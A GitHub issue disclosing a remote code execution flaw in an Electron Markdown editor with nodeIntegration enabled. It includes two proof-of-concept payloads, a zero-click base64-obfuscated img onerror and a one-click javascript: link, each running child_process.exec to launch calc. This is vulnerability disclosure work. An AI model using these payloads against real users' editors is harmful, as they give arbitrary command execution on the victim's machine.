Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
nodeIntegration: true decide Node APIs are enabled in renderer. And Markdown Editor does not filter dangerous operations. When we use this software to open the unknown markdwon file, it may cause Remote code execution (RCE).
nodeIntegration: true
EXP
# 0 click <img src=# onerror='eval(new Buffer(`amF2YXNjcmlwdDpyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnY2FsYycsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57YWxlcnQoJ1lvdSB3ZXJlIGhhY2tlZC4nKX0p`, `base64`).toString())'> # 1 click <a href="javascript:require('child_process').exec('calc', (error, stdout, stderr)=>{alert('You were hacked.')})">CLICK</a>
The text was updated successfully, but these errors were encountered:
No branches or pull requests
nodeIntegration: truedecide Node APIs are enabled in renderer. And Markdown Editor does not filter dangerous operations. When we use this software to open the unknown markdwon file, it may cause Remote code execution (RCE).EXP
The text was updated successfully, but these errors were encountered: